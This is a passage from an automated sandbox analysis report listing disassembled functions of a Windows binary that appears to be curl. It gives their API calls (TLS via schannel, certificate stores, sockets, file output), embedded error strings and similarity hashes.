fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002), ref: 001040AD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 001040CA
fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000001,00000000), ref: 001040F3
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00104109
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00104140
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000), ref: 00104161
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010418D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001041F4
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000008,?,00000000,00000000,00000001), ref: 00104214
PFXImportCertStore.CRYPT32(?,00000000,00000000), ref: 0010422D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00104244
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010427E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00104285
CertFindCertificateInStore.CRYPT32(?,00010001,00000000,00000000,00000000,00000000), ref: 001042CF
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001042E3
CertCloseStore.CRYPT32(?,00000000), ref: 00104301
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00104321
CertOpenStore.CRYPT32(00000009,00000000,00000000,?,?), ref: 00104345
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00104355
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00104380
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 0010438C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001043A6
CryptStringToBinaryA.CRYPT32(?,00000028,00000004,?,00000014), ref: 001043D5
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 001043E4
CertFindCertificateInStore.CRYPT32(?,00010001,00000000,00010000,00000014,00000000), ref: 00104415
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00104426
CertCloseStore.CRYPT32(?), ref: 00104456
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00104470
CertFreeCertificateContext.CRYPT32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0010449C
CertFreeCertificateContext.CRYPT32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001044EC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010452A

Strings

schannel: unable to allocate memory, xrefs: 00104480
schannel: Failed to import cert file %s, last error is 0x%x, xrefs: 001042B0
schannel: Failed to get certificate from file %s, last error is 0x%x, xrefs: 001042F0
Microsoft Unified Security Protocol Provider, xrefs: 001044C8
schannel: Failed to get certificate location or file for %s, xrefs: 00104312
(memory blob), xrefs: 0010402B, 00104038, 00104075
schannel: Failed to read cert file %s, xrefs: 00104123
schannel: Failed to import cert file %s, password is bad, xrefs: 00104296
schannel: AcquireCredentialsHandle failed: %s, xrefs: 00104506
schannel: Failed to open cert store %x %s, last error is 0x%x, xrefs: 00104363
schannel: certificate format compatibility error for %s, xrefs: 00104039
Unable to set ciphers to passed via SSL_CONN_CONFIG, xrefs: 00103F29
P12, xrefs: 00104017

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$Cert$Store$Certificate$ErrorLast$CloseContextFindFree_mbschrfseekmalloc$BinaryByteCharCryptImportMultiOpenStringWide_mbsnbcmp_strdupcallocfclosefopenfreadftell
String ID: (memory blob)$Microsoft Unified Security Protocol Provider$P12$Unable to set ciphers to passed via SSL_CONN_CONFIG$schannel: AcquireCredentialsHandle failed: %s$schannel: Failed to get certificate from file %s, last error is 0x%x$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%x$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %x %s, last error is 0x%x$schannel: Failed to read cert file %s$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
API String ID: 2859572553-531812395
Opcode ID: 9d068f5e5b81ba0ce6fa461c56a4cbed7f46ded8d0df0e432d7278cba46110eb
Instruction ID: ed28636ce467a8e396fe6b3a495e368fb3341a08ac4743fcf8bbd28c0cac4a1a
Opcode Fuzzy Hash: 9d068f5e5b81ba0ce6fa461c56a4cbed7f46ded8d0df0e432d7278cba46110eb
Instruction Fuzzy Hash: B102B9B1A00626DBDB249F64DD84BED77B9FF44314F1040AAFA59A72C1DBB05E808F91

Function 000DD33A Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 129
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD34B
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD363
_mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,00117348,?,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD374
LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1(security.dll,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD389
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(000F4EA1,AddDllDirectory,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD39D
LoadLibraryExA.KERNELBASE(?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD3B6
GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,00000000,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD3C1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD3F6
GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD406
LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1(000F4EA1,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD461
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,000F4EA1,?,?,000DD2C2), ref: 000DD478

Strings

LoadLibraryExA, xrefs: 000DD35D
security.dll, xrefs: 000DD370, 000DD388, 000DD3AD
AddDllDirectory, xrefs: 000DD395
kernel32, xrefs: 000DD342

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: LibraryLoad$AddressDirectoryProcSystem$HandleModule_mbspbrkfreemalloc
String ID: AddDllDirectory$LoadLibraryExA$kernel32$security.dll
API String ID: 184734234-2138446276
Opcode ID: a4bdf05f0085780a8463dba32719a35e94af5db13526fca202d54dee989e35d0
Instruction ID: c1f317bbc36b632ad3852d72bf0a6ba9d48bfffb2f1e589a55082b1283c299f5
Opcode Fuzzy Hash: a4bdf05f0085780a8463dba32719a35e94af5db13526fca202d54dee989e35d0
Instruction Fuzzy Hash: 41413A35A00711FBCB195F64ED186AE3BB6EF85700714806BEC42E7751CB315E428BA1

Function 0010699F Relevance: 24.2, APIs: 16, Instructions: 160
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 001069C9
htonl.WS2_32(7F000001), ref: 001069F0
setsockopt.WS2_32(00000000,0000FFFF,00000004,?,00000004), ref: 00106A12
bind.WS2_32(00000000,?,00000010), ref: 00106A27
getsockname.WS2_32(00000000,?,00000010), ref: 00106A3E
listen.WS2_32(00000000,00000001), ref: 00106A59
socket.WS2_32(00000002,00000001,00000000), ref: 00106A6F
connect.WS2_32(00000000,?,00000010), ref: 00106A86
ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00106AA5
accept.WS2_32(00000000,00000000,00000000), ref: 00106AD6
getsockname.WS2_32(?,?,00000010), ref: 00106AF4
getpeername.WS2_32(?,?,00000010), ref: 00106B14
closesocket.WS2_32(00000000), ref: 00106B41
closesocket.WS2_32(00000000), ref: 00106B4C
closesocket.WS2_32(?), ref: 00106B54
closesocket.WS2_32(?), ref: 00106B5D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: closesocket$getsocknamesocket$acceptbindconnectgetpeernamehtonlioctlsocketlistensetsockopt
String ID:
API String ID: 2616969812-0
Opcode ID: 0528490e5bcada4e82630cfc699d4169584751bb1e0b72da86244b0d9f3bb20d
Instruction ID: ad765eb77750555692482611afad1f5acbdc535f9f45d9fc9ff9a03371c9e5f3
Opcode Fuzzy Hash: 0528490e5bcada4e82630cfc699d4169584751bb1e0b72da86244b0d9f3bb20d
Instruction Fuzzy Hash: 7D5162B1A00509EFDB109FA0DD85BEEBBBAFF08310F508525F641F6190DBB099948B64

Function 000D1535 Relevance: 13.1, APIs: 3, Strings: 4, Instructions: 886COMMON

Download Yara Rule

APIs

fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000D15D6
fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000D1616

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 000D1563, 000D1A5D, 000D1AB5
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 000D1A58, 000D1ABA
%ld, xrefs: 000D1811
.%ld, xrefs: 000D186D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: fputc
String ID: %ld$.%ld$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 1992160199-2365385051
Opcode ID: 62344202391d2d6d670db1137f7b9eea0ac98986d8fe51ad47d440c7f159ff79
Instruction ID: d060205c034113d6d0b6fa132fdb0a7768da39a80186c8386ae5cfa9518f9d5a
Opcode Fuzzy Hash: 62344202391d2d6d670db1137f7b9eea0ac98986d8fe51ad47d440c7f159ff79
Instruction Fuzzy Hash: 9D629E71208741AFD768CF28D8947AABBE2EFD4754F244A2FF49186391CF70C8458B62

Function 000DDB77 Relevance: 3.0, APIs: 2, Instructions: 27networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,00000000), ref: 000DDB81
WSAGetLastError.WS2_32(?,?,?,00000000), ref: 000DDB8E

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLastrecv
String ID:
API String ID: 2514157807-0
Opcode ID: 8cbaf5c83020ac08fc6d9424167e596624048c7d2ab4b8ed2af15b06c0d0f1c5
Instruction ID: 6fd389ce4de96bfece390164464adbc4731a9ee3eb1b9c74615cc540c30aa20a
Opcode Fuzzy Hash: 8cbaf5c83020ac08fc6d9424167e596624048c7d2ab4b8ed2af15b06c0d0f1c5
Instruction Fuzzy Hash: 68E09271244708AFEB188B70EC45B7937A9DB85730F20C15AFD198A7D0D67199808650

Function 000C9327 Relevance: 75.9, APIs: 29, Strings: 14, Instructions: 651fileCOMMON

Download Yara Rule

APIs

_close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,000CD002,?,?,?,?,?,?,?,000CCD94,000CD002,?,?,?), ref: 000C9374
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo,00000002,?,?,00000000,000CD002), ref: 000C93D4
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C9449
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C94A2
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00117668,?), ref: 000C9775
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C978C
_unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000078,?,00000000,000CD002), ref: 000C97DA
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000078,?,00000000,000CD002), ref: 000C9843
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,000CD002), ref: 000C988B
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C9927
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C993A
_get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C9943
_lseeki64.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,00000000), ref: 000C9952
SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,000CD002), ref: 000C9968
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000002,?,?,?,?,?,?,?,00000000,000CD002), ref: 000C997C
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C9AA7
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9ABD

Strings

Problem %s. Will retry in %ld seconds. %ld retries left., xrefs: 000C98B3
curl: (23) Failed seeking to end of file, xrefs: 000C9991
Removing output file: %s, xrefs: 000C97CA
Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u, xrefs: 000C9A6D
curl: (%d) The requested URL returned error: %ld, xrefs: 000C9416
Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u, xrefs: 000C9A45
curl: (%d) %s, xrefs: 000C93B0
curl: (23) Failed to truncate file, xrefs: 000C99BD
Failed to set filetime %I64d on outfile: overflow, xrefs: 000C986F
curl: (%d) Failed writing body, xrefs: 000C94BF, 000C97A9
Throwing away %I64d bytes, xrefs: 000C9913
More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo, xrefs: 000C93CF
M', xrefs: 000C956B
The Retry-After: time would make this command line exceed the maximum allowed time for retries., xrefs: 000C974C

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _filenofclosefflushfputsfree$File_close_get_osfhandle_lseeki64_strdup_unlinkfseek
String ID: Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u$Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u$Failed to set filetime %I64d on outfile: overflow$M'$More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo$Problem %s. Will retry in %ld seconds. %ld retries left.$Removing output file: %s$The Retry-After: time would make this command line exceed the maximum allowed time for retries.$Throwing away %I64d bytes$curl: (%d) %s$curl: (%d) Failed writing body$curl: (%d) The requested URL returned error: %ld$curl: (23) Failed seeking to end of file$curl: (23) Failed to truncate file
API String ID: 968532693-3733868149
Opcode ID: 47d076c3c7849488b1e8e64dd0d0148d139d145ae76e897e663a6be7f112f079
Instruction ID: c927833e8b2acdad620c181dc368fd9d40828a4067dbaa286c5e9f1c4b410e2a
Opcode Fuzzy Hash: 47d076c3c7849488b1e8e64dd0d0148d139d145ae76e897e663a6be7f112f079
Instruction Fuzzy Hash: F2329871A00205EFEB699FA8D889FEEBBF5FF04300F14406DE415A62A2D775AD90CB50

Function 00104585 Relevance: 37.2, APIs: 7, Strings: 14, Instructions: 415
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,wine_get_version), ref: 0010463C
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00104643
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 001047FA
inet_pton.WS2_32(00000002,?,?), ref: 00104823
inet_pton.WS2_32(00000017,?,?), ref: 0010483C
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010497C

Strings

schannel: unable to allocate memory, xrefs: 0010498F
wine_get_version, xrefs: 00104632
schannel: using IP address, SNI is not supported by OS., xrefs: 00104846
schannel: failed to send initial handshake data: sent %zd of %lu bytes, xrefs: 00104B07
Failed to set SNI, xrefs: 001047E5
schannel: SNI or certificate check failed: %s, xrefs: 00104A52
http/1.1, xrefs: 00104859
/1.1, xrefs: 0010487F
schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 0010461C
http, xrefs: 00104875
schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 00104B1F
schannel: initial InitializeSecurityContext failed: %s, xrefs: 00104A38, 00104A6F
ntdll, xrefs: 00104637
ALPN: offers %s, xrefs: 0010485E

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: inet_pton$AddressHandleModuleProc_strdupcalloc
String ID: /1.1$ALPN: offers %s$Failed to set SNI$http$http/1.1$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
API String ID: 1589778587-246979986
Opcode ID: 21d2abae753d726af358d1926870c8c67ebc0e39c51501436aefc22053ca78ed
Instruction ID: 8b72dc9ab04bda1ed8a146871a0132fd3e4d0292691efb139fc53387b71b591f
Opcode Fuzzy Hash: 21d2abae753d726af358d1926870c8c67ebc0e39c51501436aefc22053ca78ed
Instruction Fuzzy Hash: 3CF1C1B0A04214DFEB289F14DC85BE977B5EF46310F1441EAE9899B2C2EBB19D84CF51

Function 000F2F70 Relevance: 35.0, APIs: 8, Strings: 15, Instructions: 460
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F2FFA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F3075
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F3098
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F3105
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F3147

Part of subcall function 000F2B7A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F2BB8

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F3386
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F33A4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F33BE

Strings

Proxy-Connection: Keep-Alive, xrefs: 000F3262
Referer, xrefs: 000F30AE
Accept: */*, xrefs: 000F3184
1.0, xrefs: 000F31CD
Accept, xrefs: 000F316F
Proxy-Connection, xrefs: 000F323B, 000F3252
%s , xrefs: 000F31FA
HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s, xrefs: 000F3360
User-Agent, xrefs: 000F2FD5
1.1, xrefs: 000F31C8
%s?%s, xrefs: 000F302C
Referer: %s, xrefs: 000F30C0
upload completely sent off: %I64d out of %I64d bytes, xrefs: 000F34F9
Accept-Encoding, xrefs: 000F30D8
Accept-Encoding: %s, xrefs: 000F3115

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s $%s?%s$1.0$1.1$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Proxy-Connection$Proxy-Connection: Keep-Alive$Referer$Referer: %s$User-Agent$upload completely sent off: %I64d out of %I64d bytes
API String ID: 1294909896-3403769770
Opcode ID: 75551b7e84dccc3e7fd0f8aa8e67ac5e72c261df2bea16ee604d9dfce7a23de1
Instruction ID: f99d102be7cdc78f4730a1d92f1dcd1a4ba506c6ce42274892570732645ec576
Opcode Fuzzy Hash: 75551b7e84dccc3e7fd0f8aa8e67ac5e72c261df2bea16ee604d9dfce7a23de1
Instruction Fuzzy Hash: F202E531704706AFDB59CB24D840BBAB7E2FFC4320F14462EE95897691DB30ED51AB92

Function 000C1FDC Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 198
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,?,?,?,?,000C184E), ref: 000C2082
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00000000,?,?,?,?,?,?,000C184E), ref: 000C20CA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?,?,?,?,000C184E), ref: 000C20DD
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,out of memory,?,?,?,?,?,000C184E), ref: 000C20F9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,000C184E), ref: 000C211F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,000C184E), ref: 000C212A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000C216F
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,00117138,?,?,00000000,?,?,?,?,?,?,000C184E), ref: 000C219C
_close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,?,?,?,?,?,?,000C184E), ref: 000C21AE
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00117138,?,?,00000000,?,?,?,?,?,?,000C184E), ref: 000C21BC
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,000C184E), ref: 000C21CB
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,000C184E), ref: 000C21D3
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,Failed to open the file %s: %s,?,00000000,?,?,?,000C184E), ref: 000C21EA
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,000C184E), ref: 000C21F6

Strings

%s/%s, xrefs: 000C201E
out of memory, xrefs: 000C2034, 000C20EB
Remote filename has no length!, xrefs: 000C221B
Failed to open the file %s: %s, xrefs: 000C21DC
overflow in filename generation, xrefs: 000C20D0

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _errno$free$_close_fdopenfopenmallocstrerror
String ID: %s/%s$Failed to open the file %s: %s$Remote filename has no length!$out of memory$overflow in filename generation
API String ID: 2640482070-2634015058
Opcode ID: 11677caea8d95d31936bb9e006ff50ac4dc0544703ac5d501594a12482132e51
Instruction ID: 30bd86f5a3dd28bfe3ab71345c65eeb318332135fffcce18b689b1d8b99a6f9f
Opcode Fuzzy Hash: 11677caea8d95d31936bb9e006ff50ac4dc0544703ac5d501594a12482132e51
Instruction Fuzzy Hash: 20610171904705EFCB249FA4DC49EAEBBF5FF64310F24852EE911A7A92D7708980CB60

Function 00105AA0 Relevance: 31.9, APIs: 2, Strings: 16, Instructions: 411
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

schannel: failed to read data from server: %s, xrefs: 00105E8D
schannel: an unrecoverable error occurred in a prior call, xrefs: 00105B33
schannel: Curl_read_plain returned CURLE_RECV_ERROR, xrefs: 00105C0F
schannel: server closed the connection, xrefs: 00105EE5
schannel: Curl_read_plain returned error %d, xrefs: 00105C1F
schannel: can't renegotiate, an error is pending, xrefs: 00105EB7
schannel: SSL/TLS connection renegotiated, xrefs: 00105E33
schannel: server closed abruptly (missing close_notify), xrefs: 00105F34
schannel: can't renegotiate, encrypted data available, xrefs: 00105ED1
schannel: server indicated shutdown in a prior call, xrefs: 00105B4A
schannel: failed to decrypt data, need more data, xrefs: 00105E6D
schannel: renegotiating SSL/TLS connection, xrefs: 00105DE5
schannel: unable to re-allocate memory, xrefs: 00105BB8, 00105EA1
schannel: enough decrypted data is already available, xrefs: 00105B18
schannel: renegotiation failed, xrefs: 00105EC1
schannel: remote party requests renegotiation, xrefs: 00105DBC

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
